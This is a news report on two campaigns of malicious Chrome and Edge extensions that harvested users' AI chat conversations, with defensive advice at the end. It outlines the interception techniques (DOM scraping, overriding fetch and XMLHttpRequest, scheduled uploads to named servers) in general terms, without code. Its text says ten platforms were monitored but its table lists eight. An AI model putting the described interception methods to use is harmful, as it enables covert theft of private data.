Over 9 million Chrome and Edge users have had their private AI conversations stolen by malicious browser extensions disguised as productivity tools, with both campaigns involving Google-featured extensions that secretly exfiltrated ChatGPT, DeepSeek, and other AI chat data to remote servers.
Dual Security Breaches Target AI Users
Two separate malware campaigns have exposed a critical vulnerability in browser extension security, compromising millions of users who trusted Google’s vetting process. Security researchers from OX Security and Koi Security independently uncovered the sophisticated data theft operations that specifically targeted private conversations with artificial intelligence platforms.
The first campaign, discovered by OX Security on December 29, 2025, affected approximately 900,000 Chrome users through two malicious extensions that impersonated the legitimate AITOPIA AI assistant plugin. The second campaign, revealed by Koi Security in mid-December 2025, compromised over 8 million users across Chrome and Microsoft Edge through VPN and ad-blocking extensions that had been secretly harvesting AI chats since July 2025.
The 900,000-User Attack
OX Security’s investigation revealed two malicious extensions that cloned the legitimate AITOPIA Chrome extension to evade detection. The extensions “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” accumulated 600,000 installations, while “AI Sidebar with Deepseek, ChatGPT, Claude, and more” reached 300,000 installations.
Both extensions received Google’s “Featured” badge on the Chrome Web Store, a designation intended to signal compliance with security best practices. The malware mimicked AITOPIA’s user interface and functionality so precisely that users experienced no noticeable disruption while their data was being exfiltrated.
The attackers manipulated Chrome’s permissions system by requesting access under the pretense of collecting “anonymous, non-identifiable analytics,” which they exploited for widespread surveillance. Once installed, the extensions assigned each user a unique identifier and began monitoring browser activity, specifically targeting visits to ChatGPT and DeepSeek platforms.
How the Data Theft Operated
The malicious extensions employed sophisticated techniques to harvest sensitive information. They scraped chat content directly from the Document Object Model (DOM) using Chrome’s tabs.onUpdated API to capture conversation data and all active tab URLs. This exposed users’ browsing habits, research keywords, and potentially sensitive query parameters.
The stolen data was encoded in Base64 format and transmitted to command-and-control servers at deepaichats[.]com and chatsaigpt[.]com every 30 minutes. The extensions cached data locally before batch-uploading it to attacker-controlled infrastructure hosted on Lovable, complicating attribution efforts.
In a particularly insidious persistence mechanism, uninstalling one malicious extension automatically opened a browser tab suggesting installation of the other extension, ensuring continued access to user data.
The 8 Million-User VPN Campaign
The larger campaign, affecting over 8 million users, involved multiple extensions from publisher Urban Cybersecurity. The primary extension, Urban VPN Proxy, had accumulated more than 6 million Chrome installations and 1.3 million Edge installations before researchers discovered its malicious functionality.
Seven additional extensions from the same publisher contained identical data harvesting code, including 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker. These extensions also carried “Featured” labels on browser stores, significantly increasing user trust.
The malicious behavior was introduced through version 5.5.0, released on July 9, 2025, and deployed via automatic updates without user awareness. The extensions were particularly deceptive because they were marketed as privacy and security tools, with Chrome Web Store listings describing the product as protecting users from entering personal information into AI chatbots.
Targeted AI Platforms
The VPN campaign monitored conversations across ten major AI platforms:
| AI Platform | Data Collected |
| ChatGPT (OpenAI) | Full prompts, responses, conversation IDs |
| Google Gemini | User queries and AI responses |
| Anthropic Claude | Complete conversation threads |
| Microsoft Copilot | Prompts and generated content |
| Perplexity | Search queries and AI answers |
| DeepSeek | Chat interactions and metadata |
| Grok (xAI) | User inputs and outputs |
| Meta AI | Conversation data and timestamps |
Technical Exploitation Method
When users opened AI chat platforms in their browsers, the extensions injected platform-specific JavaScript executors directly into web pages. These scripts overrode key browser network APIs, including fetch() and XMLHttpRequest, to intercept AI prompts, responses, conversation IDs, timestamps, and session metadata before browser encryption secured them.
The captured data was then transmitted to remote analytics endpoints controlled by the extension operator or affiliated data brokers. The interception occurred at the network layer, allowing the extensions to capture data regardless of whether their advertised protection features were enabled.
Google’s Response and Ongoing Risks
OX Security reported their findings to Google on December 29, 2025. However, as of December 30, 2025, both extensions from the 900,000-user campaign remained publicly available on the Chrome Web Store, with the most popular variant still displaying Google’s “Featured” badge.
This incident raises serious questions about Google’s extension vetting process, particularly the criteria for awarding “Featured” status to extensions that later prove malicious. The presence of multiple malicious extensions bearing security endorsements suggests systematic failures in the review process.
Privacy and Security Implications
Both campaigns represent sophisticated attacks on an increasingly sensitive category of data: AI conversations. Users frequently share confidential information with AI assistants, including proprietary business strategies, personal health concerns, legal questions, and financial data.
The extensions captured not only AI chat content but also session tokens that could potentially grant attackers access to user accounts. For enterprise users, the theft of internal corporate information discussed in AI conversations poses significant competitive intelligence and data breach risks.
The harvested browsing URLs and search parameters expose detailed user behavior patterns, research interests, and potentially identifying information embedded in URL query strings. This comprehensive surveillance capability extends far beyond the stated functionality of productivity or privacy tools.
Protecting Against Extension-Based Attacks
Security experts recommend several precautions for browser extension users. Users should carefully review permissions requested by extensions, particularly those requiring “Read and change all your data on all websites” access. This permission level grants extensions complete visibility into all browser activity, including rendered web page content.
Even extensions with high ratings and “Featured” badges require scrutiny, as both campaigns demonstrated that these endorsements do not guarantee security. Users should verify extension publishers, check for suspicious permission requests, and regularly audit installed extensions for unnecessary or excessive access rights.
Organizations should implement browser extension whitelisting policies and educate employees about the risks of installing unvetted extensions, particularly on devices used for sensitive work.
Final Thoughts
The dual browser extension campaigns affecting over 9 million users represent a significant escalation in data theft targeting AI platform users. The sophisticated impersonation techniques, exploitation of trusted security badges, and specific focus on AI conversations indicate that threat actors recognize the value of this emerging data category.
The persistence of malicious extensions on official browser stores days after disclosure suggests ongoing risk for users who have not manually removed affected extensions. Both campaigns demonstrate that traditional security indicators like store ratings, featured badges, and high installation counts provide insufficient protection against determined attackers.
As AI platforms become increasingly integrated into personal and professional workflows, browser extension security will require enhanced scrutiny from both platform providers and users. The incidents underscore the critical need for improved extension vetting processes, mandatory security audits for featured extensions, and greater transparency about data collection practices.






